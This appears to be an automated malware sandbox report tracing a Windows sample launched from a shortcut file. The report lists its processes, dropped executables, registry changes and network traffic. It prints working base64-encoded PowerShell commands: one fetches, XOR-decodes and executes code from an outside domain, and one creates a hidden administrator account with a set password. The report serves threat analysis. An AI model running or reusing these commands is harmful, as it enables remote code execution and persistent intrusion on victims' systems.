Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: svczHost.exe.9.dr	Static PE information: section name: .managed
Source: svczHost.exe.9.dr	Static PE information: section name: hydrated
Source: myRdpService.exe.18.dr	Static PE information: section name: .managed
Source: myRdpService.exe.18.dr	Static PE information: section name: hydrated

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFBBA2EAF4D push eax; iretd	2_2_00007FFBBA2EAF61
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFBBA2E77EE pushad ; iretd	2_2_00007FFBBA2E781D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFBBA2E781E push eax; iretd	2_2_00007FFBBA2E782D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFBBA2E14B3 push cs; ret	2_2_00007FFBBA2E14BA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFBBA1ED2A5 pushad ; iretd	5_2_00007FFBBA1ED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFBBA301B23 push cs; ret	5_2_00007FFBBA301B32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFBBA301FD2 push eax; iretd	5_2_00007FFBBA302009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFBBA1CD2A5 pushad ; iretd	9_2_00007FFBBA1CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFBBA2EAF6D push ebx; retf	9_2_00007FFBBA2EAFCA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFBBA2EAFCB push ebx; retf	9_2_00007FFBBA2EAFCA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFBBA2E77EE pushad ; iretd	9_2_00007FFBBA2E781D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFBBA2E781E push eax; iretd	9_2_00007FFBBA2E782D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFBBA2E14B3 push cs; ret	9_2_00007FFBBA2E14BA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFBBA3B6B08 push eax; retf	9_2_00007FFBBA3B6B09
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFBBA892571 push 8B485F46h; iretd	9_2_00007FFBBA892576
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FFBBA30146B push cs; ret	24_2_00007FFBBA30147A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FFBBA307918 push ebx; retf	24_2_00007FFBBA30794A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FFBBA307930 push ebx; retf	24_2_00007FFBBA30794A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 40_2_00007FFBBA2E18B1 push E95F4F2Dh; ret	40_2_00007FFBBA2E1A19
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 40_2_00007FFBBA2E146B push cs; ret	40_2_00007FFBBA2E147A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 44_2_00007FFBBA2F22C5 pushad ; iretd	44_2_00007FFBBA2F232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 44_2_00007FFBBA2F145B push cs; ret	44_2_00007FFBBA2F146A

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\svczHost.exe			Jump to dropped file
Source: C:\Windows\Temp\svczHost.exe	File created: C:\Windows\Temp\myRdpService.exe			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\svczHost.exe			Jump to dropped file
Source: C:\Windows\Temp\svczHost.exe	File created: C:\Windows\Temp\myRdpService.exe			Jump to dropped file

Source: C:\Windows\Temp\myRdpService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\myRdpService

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc query myRdpService

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: svczHost.exe, 00000012.00000002.25195031017.0000024F7B03F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: aHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListH
Source: svczHost.exe, 00000012.00000002.25195031017.0000024F7B03F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: aHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49762

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
